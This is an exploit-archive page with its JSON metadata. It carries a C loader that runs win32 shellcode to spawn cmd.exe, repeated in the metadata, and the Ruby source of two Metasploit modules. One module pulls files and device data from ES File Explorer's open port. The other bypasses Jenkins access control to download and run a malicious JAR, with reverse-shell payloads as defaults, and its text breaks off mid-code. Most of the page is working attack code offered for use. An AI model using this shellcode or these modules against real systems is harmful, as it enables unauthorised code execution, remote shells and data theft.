Search...

win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes

2010-06-25T00:00:00

ID 1337DAY-ID-12941
Type zdt
Reporter RubberDuck
Modified 2010-06-25T00:00:00

Description

Exploit for win32 platform in category shellcode

                                        
                                            =========================================================
win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
=========================================================


/*
Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
Date: 2010-06-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule and others
*/
 
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
 
int main(){
    unsigned char shellcode[]=
    "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
    "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
    "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
    "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
    "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
    "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
    "\x24\x20\x57\xFF\xD0";
 
    printf("Size = %d\n", strlen(shellcode));
 
    system("PAUSE");
 
    ((void (*)())shellcode)();
 
    return 0;
}



#  0day.today [2018-01-02]  #

JSON Vulners Source

Initial Source

{"published": "2010-06-25T00:00:00", "id": "1337DAY-ID-12941", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:14:06", "bulletin": {"published": "2010-06-25T00:00:00", "id": "1337DAY-ID-12941", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:14:06"}}, "hash": "b3651c541924b6f5078ea6228bdcf648834f475de2d133fe78fd4cddd1899ef8", "description": "Exploit for win32 platform in category shellcode", "type": "zdt", "lastseen": "2016-04-20T02:14:06", "edition": 1, "title": "win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes", "href": "http://0day.today/exploit/description/12941", "modified": "2010-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/12941", "references": [], "reporter": "RubberDuck", "sourceData": "=========================================================\r\nwin32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\n=========================================================\r\n\r\n\r\n/*\r\nTitle: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\nDate: 2010-06-25\r\nAuthor: RubberDuck\r\nWeb: http://bflow.security-portal.cz\r\nTested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)\r\nThanks to: kernelhunter, Lodus, Vrtule and others\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\nint main(){\r\n unsigned char shellcode[]=\r\n \"\\xFC\\x33\\xD2\\xB2\\x30\\x64\\xFF\\x32\\x5A\\x8B\"\r\n \"\\x52\\x0C\\x8B\\x52\\x14\\x8B\\x72\\x28\\x33\\xC9\"\r\n \"\\xB1\\x18\\x33\\xFF\\x33\\xC0\\xAC\\x3C\\x61\\x7C\"\r\n \"\\x02\\x2C\\x20\\xC1\\xCF\\x0D\\x03\\xF8\\xE2\\xF0\"\r\n \"\\x81\\xFF\\x5B\\xBC\\x4A\\x6A\\x8B\\x5A\\x10\\x8B\"\r\n \"\\x12\\x75\\xDA\\x8B\\x53\\x3C\\x03\\xD3\\xFF\\x72\"\r\n \"\\x34\\x8B\\x52\\x78\\x03\\xD3\\x8B\\x72\\x20\\x03\"\r\n \"\\xF3\\x33\\xC9\\x41\\xAD\\x03\\xC3\\x81\\x38\\x47\"\r\n \"\\x65\\x74\\x50\\x75\\xF4\\x81\\x78\\x04\\x72\\x6F\"\r\n \"\\x63\\x41\\x75\\xEB\\x81\\x78\\x08\\x64\\x64\\x72\"\r\n \"\\x65\\x75\\xE2\\x49\\x8B\\x72\\x24\\x03\\xF3\\x66\"\r\n \"\\x8B\\x0C\\x4E\\x8B\\x72\\x1C\\x03\\xF3\\x8B\\x14\"\r\n \"\\x8E\\x03\\xD3\\x52\\x68\\x78\\x65\\x63\\x01\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x57\\x69\\x6E\\x45\\x54\\x53\"\r\n \"\\xFF\\xD2\\x68\\x63\\x6D\\x64\\x01\\xFE\\x4C\\x24\"\r\n \"\\x03\\x6A\\x05\\x33\\xC9\\x8D\\x4C\\x24\\x04\\x51\"\r\n \"\\xFF\\xD0\\x68\\x65\\x73\\x73\\x01\\x8B\\xDF\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x50\\x72\\x6F\\x63\\x68\\x45\"\r\n \"\\x78\\x69\\x74\\x54\\xFF\\x74\\x24\\x20\\xFF\\x54\"\r\n \"\\x24\\x20\\x57\\xFF\\xD0\";\r\n \r\n printf(\"Size = %d\\n\", strlen(shellcode));\r\n \r\n system(\"PAUSE\");\r\n \r\n ((void (*)())shellcode)();\r\n \r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "21cbaab14a471b75fed0f3376fc6c601", "key": "reporter"}, {"hash": "059379f5bd3536268e22ac6c72f403ae", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "99a37fedde2cb1d7914067eadece0338", "key": "description"}, {"hash": "2789576efabdaffaf9ed9daf1c1471a8", "key": "sourceData"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5a4c063d45e3eded25425ad6261389c3", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7c6eafad7dd7e7ad776b284eb9fb9df3", "key": "sourceHref"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for win32 platform in category shellcode", "hash": "44af90efccb3f26e2a64f767bc8dda42b0b7cfee0a095c5aaa302e5668feb3b0", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-01-02T23:01:59"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27076", "1337DAY-ID-21026", "1337DAY-ID-2560"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29662", "SECURITYVULNS:VULN:12941", "SECURITYVULNS:DOC:15499", "SECURITYVULNS:VULN:6213"]}, {"type": "exploitdb", "idList": ["EDB-ID:27076"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122521"]}], "modified": "2018-01-02T23:01:59"}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-01-02T23:01:59", "edition": 2, "title": "win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes", "href": "https://0day.today/exploit/description/12941", "modified": "2010-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/12941", "references": [], "reporter": "RubberDuck", "sourceData": "=========================================================\r\nwin32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\n=========================================================\r\n\r\n\r\n/*\r\nTitle: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\nDate: 2010-06-25\r\nAuthor: RubberDuck\r\nWeb: http://bflow.security-portal.cz\r\nTested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)\r\nThanks to: kernelhunter, Lodus, Vrtule and others\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\nint main(){\r\n unsigned char shellcode[]=\r\n \"\\xFC\\x33\\xD2\\xB2\\x30\\x64\\xFF\\x32\\x5A\\x8B\"\r\n \"\\x52\\x0C\\x8B\\x52\\x14\\x8B\\x72\\x28\\x33\\xC9\"\r\n \"\\xB1\\x18\\x33\\xFF\\x33\\xC0\\xAC\\x3C\\x61\\x7C\"\r\n \"\\x02\\x2C\\x20\\xC1\\xCF\\x0D\\x03\\xF8\\xE2\\xF0\"\r\n \"\\x81\\xFF\\x5B\\xBC\\x4A\\x6A\\x8B\\x5A\\x10\\x8B\"\r\n \"\\x12\\x75\\xDA\\x8B\\x53\\x3C\\x03\\xD3\\xFF\\x72\"\r\n \"\\x34\\x8B\\x52\\x78\\x03\\xD3\\x8B\\x72\\x20\\x03\"\r\n \"\\xF3\\x33\\xC9\\x41\\xAD\\x03\\xC3\\x81\\x38\\x47\"\r\n \"\\x65\\x74\\x50\\x75\\xF4\\x81\\x78\\x04\\x72\\x6F\"\r\n \"\\x63\\x41\\x75\\xEB\\x81\\x78\\x08\\x64\\x64\\x72\"\r\n \"\\x65\\x75\\xE2\\x49\\x8B\\x72\\x24\\x03\\xF3\\x66\"\r\n \"\\x8B\\x0C\\x4E\\x8B\\x72\\x1C\\x03\\xF3\\x8B\\x14\"\r\n \"\\x8E\\x03\\xD3\\x52\\x68\\x78\\x65\\x63\\x01\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x57\\x69\\x6E\\x45\\x54\\x53\"\r\n \"\\xFF\\xD2\\x68\\x63\\x6D\\x64\\x01\\xFE\\x4C\\x24\"\r\n \"\\x03\\x6A\\x05\\x33\\xC9\\x8D\\x4C\\x24\\x04\\x51\"\r\n \"\\xFF\\xD0\\x68\\x65\\x73\\x73\\x01\\x8B\\xDF\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x50\\x72\\x6F\\x63\\x68\\x45\"\r\n \"\\x78\\x69\\x74\\x54\\xFF\\x74\\x24\\x20\\xFF\\x54\"\r\n \"\\x24\\x20\\x57\\xFF\\xD0\";\r\n \r\n printf(\"Size = %d\\n\", strlen(shellcode));\r\n \r\n system(\"PAUSE\");\r\n \r\n ((void (*)())shellcode)();\r\n \r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2018-01-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "99a37fedde2cb1d7914067eadece0338", "key": "description"}, {"hash": "069e2c9d0aa376fb8497858c8f2f6289", "key": "href"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "modified"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "21cbaab14a471b75fed0f3376fc6c601", "key": "reporter"}, {"hash": "b3d77d5d38c36511954eceb34105732f", "key": "sourceData"}, {"hash": "35e8c158d698693a632a8413db486fc8", "key": "sourceHref"}, {"hash": "059379f5bd3536268e22ac6c72f403ae", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"metasploit": [{"lastseen": "2019-11-20T16:26:16", "bulletinFamily": "exploit", "description": "This module connects to ES File Explorer's HTTP server to run certain commands. The HTTP server is started on app launch, and is available as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable This module has been tested against 4.1.9.5.1.\n", "modified": "2019-03-26T23:39:17", "published": "2019-03-24T12:01:32", "id": "MSF:AUXILIARY/SCANNER/HTTP/ES_FILE_EXPLORER_OPEN_PORT", "href": "", "type": "metasploit", "title": "ES File Explorer Open Port", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'ES File Explorer Open Port',\n 'Description' => %q{\n This module connects to ES File Explorer's HTTP server to run\n certain commands. The HTTP server is started on app launch, and is available\n as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable\n This module has been tested against 4.1.9.5.1.\n },\n 'References' =>\n [\n ['CVE', '2019-6447'],\n ['URL', 'https://www.ms509.com/2016/03/01/es-explorer-vul/'],\n ['URL', 'https://github.com/fs0c131y/ESFileExplorerOpenPortVuln'],\n ['URL', 'https://twitter.com/fs0c131y/status/1085460755313508352'],\n ],\n 'Author' => [\n '\u5c0f\u8377\u624d\u9732\u5c16\u5c16\u89d2', # discovery (2016)\n 'moonbocal', # discovery (2019)\n 'fs0c131y', # poc\n 'h00die' # msf module\n ],\n 'DisclosureDate' => 'Jan 16 2019',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['LISTFILES', {'Description' => 'List all the files on the sdcard'}],\n ['LISTPICS', {'Description' => 'List all the pictures'}],\n ['LISTVIDEOS', {'Description' => 'List all the videos'}],\n ['LISTAUDIOS', {'Description' => 'List all the audio files'}],\n ['LISTAPPS', {'Description' => 'List all the apps installed'}],\n ['LISTAPPSSYSTEM', {'Description' => 'List all the system apps installed'}],\n ['LISTAPPSPHONE', {'Description' => 'List all the phone apps installed'}],\n ['LISTAPPSSDCARD', {'Description' => 'List all the apk files stored on the sdcard'}],\n ['LISTAPPSALL', {'Description' => 'List all the apps installed'}],\n ['GETDEVICEINFO', {'Description' => 'Get device info'}],\n ['GETFILE', {'Description' => 'Get a file from the device. ACTIONITEM required.'}],\n ['APPLAUNCH', {'Description' => 'Launch an app. ACTIONITEM required.'}],\n ],\n 'DefaultAction' => 'GETDEVICEINFO',\n )\n\n register_options([\n Opt::RPORT(59777),\n OptString.new('ACTIONITEM', [false,'If an app or filename if required by the action']),\n ])\n\n end\n\n def sanitize_json(j)\n j.gsub!(\"},\\r\\n]\", \"}]\")\n j.gsub!(\"'\", '\"')\n return j.gsub('\", }', '\"}')\n end\n\n def http_post(command)\n send_request_raw(\n 'uri' => '/',\n 'method' => 'POST',\n 'data' => \"{ \\\"command\\\":#{command} }\",\n 'ctype' => 'application/json',\n )\n end\n\n def run_host(target_host)\n case\n when action.name == 'LISTFILES'\n res = http_post('listFiles')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listFiles.json', 'application/json', target_host, res.body, 'es_file_explorer_listfiles.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['type']}: #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTPICS'\n res = http_post('listPics')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listPics.json', 'application/json', target_host, res.body, 'es_file_explorer_listpics.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}: #{f['location']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTVIDEOS'\n res = http_post('listVideos')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listVideos.json', 'application/json', target_host, res.body, 'es_file_explorer_listvideos.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}: #{f['location']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAUDIOS'\n res = http_post('listAudios')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAudio.json', 'application/json', target_host, res.body, 'es_file_explorer_listaudio.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}: #{f['location']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPS'\n res = http_post('listApps')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listApps.json', 'application/json', target_host, res.body, 'es_file_explorer_listapps.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSSYSTEM'\n res = http_post('listAppsSystem')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsSystem.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssystem.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSPHONE'\n res = http_post('listAppsPhone')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsPhone.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsphone.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSSDCARD'\n res = http_post('listAppsSdcard')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsSdcard.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssdcard.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSALL'\n res = http_post('listAppsAll')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsAll.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsall.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'GETDEVICEINFO'\n res = http_post('getDeviceInfo')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('getDeviceInfo.json', 'application/json', target_host, res.body, 'es_file_explorer_getdeviceinfo.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n print_good(\"#{peer}- Name: #{json_resp['name']}\")\n when action.name == 'GETFILE'\n unless datastore['ACTIONITEM'].start_with?('/')\n print_error('Action item is a path for GETFILE, like /system/app/Browser.apk')\n end\n res = send_request_raw(\n 'uri' => datastore['ACTIONITEM'],\n 'method' => 'GET',\n 'ctype' => 'application/json',\n )\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable, Bad Response. File may not be available for download.\")\n return\n end\n path = store_loot('getFile', 'application/octet-stream', target_host, res.body, datastore['ACTIONITEM'])\n print_good(\"#{peer}- #{datastore['ACTIONITEM']} saved to #{path}\")\n when action.name == 'APPLAUNCH'\n if datastore['ACTIONITEM'].empty?\n print_error('Action item is a path for GETFILE, like com.android.chrome')\n end\n res = send_request_raw(\n 'uri' => '/',\n 'method' => 'POST',\n 'data' => \"{ \\\"command\\\":appLaunch, \\\"appPackageName\\\":#{datastore['ACTIONITEM']} }\",\n 'ctype' => 'application/json',\n )\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable, Bad Response. File may not be available for download.\")\n return\n end\n if res.body.include?('NameNotFoundException')\n print_error(\"#{peer}- Application #{datastore['ACTIONITEM']} not found on device\")\n return\n elsif res.body.include?('{\"result\":\"0\"}')\n print_good(\"#{peer}- #{datastore['actionitem']} launched successfully\")\n end\n end\n end\nend\n", "cvss": {"score": 4.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/es_file_explorer_open_port.rb"}, {"lastseen": "2019-11-20T16:26:17", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. When the \"Java Dropper\" target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE. When the \"Unix In-Memory\" target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution. The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n", "modified": "2019-05-30T05:06:10", "published": "2019-02-23T07:34:27", "id": "MSF:EXPLOIT/MULTI/HTTP/JENKINS_METAPROGRAMMING", "href": "", "type": "metasploit", "title": "Jenkins ACL Bypass and Metaprogramming RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',\n 'Description' => %q{\n This module exploits a vulnerability in Jenkins dynamic routing to\n bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n download and execute a malicious JAR file.\n\n When the \"Java Dropper\" target is selected, the original entry point\n based on classLoader.parseClass is used, which requires the use of\n Groovy metaprogramming to achieve RCE.\n\n When the \"Unix In-Memory\" target is selected, a newer, higher-level,\n and more universal entry point based on GroovyShell.parse is used.\n This permits the use of in-memory arbitrary command execution.\n\n The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n on later versions of Jenkins.\n\n Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n },\n 'Author' => [\n 'Orange Tsai', # (@orange_8361) Discovery and PoC\n 'Mikhail Egorov', # (@0ang3el) Discovery and PoC\n 'George Noseevich', # (@webpentest) Discovery and PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-1000861'], # Orange Tsai\n ['CVE', '2019-1003000'], # Script Security\n ['CVE', '2019-1003001'], # Pipeline: Groovy\n ['CVE', '2019-1003002'], # Pipeline: Declarative\n ['CVE', '2019-1003005'], # Mikhail Egorov\n ['CVE', '2019-1003029'], # George Noseevich\n ['EDB', '46427'],\n ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],\n ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],\n ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],\n ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc'],\n ['URL', 'https://twitter.com/orange_8361/status/1126829648552312832'],\n ['URL', 'https://github.com/orangetw/awesome-jenkins-rce-2019']\n ],\n 'DisclosureDate' => '2019-01-08', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'java'],\n 'Arch' => [ARCH_CMD, ARCH_JAVA],\n 'Privileged' => false,\n 'Targets' => [\n ['Unix In-Memory',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :unix_memory,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}\n ],\n ['Java Dropper',\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :java_dropper,\n 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'}\n ]\n ],\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Stance' => Stance::Aggressive\n ))\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('URIPATH')\n end\n\n=begin\n http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]\n=end\n def check\n checkcode = CheckCode::Safe\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1('/search/index'),\n 'vars_get' => {'q' => 'a'}\n )\n\n unless res && (version = res.headers['X-Jenkins'])\n vprint_error('Jenkins version not detected')\n return CheckCode::Unknown\n end\n\n vprint_status(\"Jenkins #{version} detected\")\n checkcode = CheckCode::Detected\n\n if Gem::Version.new(version) > target['Version']\n vprint_error(\"Jenkins #{version} is not a supported target\")\n return CheckCode::Safe\n end\n\n vprint_good(\"Jenkins #{version} is a supported target\")\n checkcode = CheckCode::Appears\n\n if res.body.include?('Administrator')\n vprint_good('ACL bypass successful')\n checkcode = CheckCode::Vulnerable\n else\n vprint_error('ACL bypass unsuccessful')\n return CheckCode::Safe\n end\n\n checkcode\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n print_status(\"Configuring #{target.name} target\")\n\n vars_get = {'value' => go_go_gadget2}\n\n case target['Type']\n when :unix_memory\n vars_get = {'sandbox' => true}.merge(vars_get)\n when :java_dropper\n # NOTE: Ivy is using HTTP unconditionally, so we can't use HTTPS\n # HACK: Both HttpClient and HttpServer use datastore['SSL']\n ssl = datastore['SSL']\n datastore['SSL'] = false\n start_service('Path' => '/')\n datastore['SSL'] = ssl\n end\n\n print_status('Sending Jenkins and Groovy go-go-gadgets')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1,\n 'vars_get' => vars_get\n )\n end\n\n #\n # Exploit methods\n #\n\n=begin\n http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword\n ?apiUrl=http://169.254.169.254/%23\n &login=orange\n &password=tsai\n=end\n def go_go_gadget1(custom_uri = nil)\n # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username\n acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')\n\n return normalize_uri(acl_bypass, custom_uri) if custom_uri\n\n rce_base = normalize_uri(acl_bypass, 'descriptorByName')\n\n rce_uri =\n case target['Type']\n when :unix_memory\n '/org.jenkinsci.plugins.' \\\n 'scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'\n when :java_dropper\n 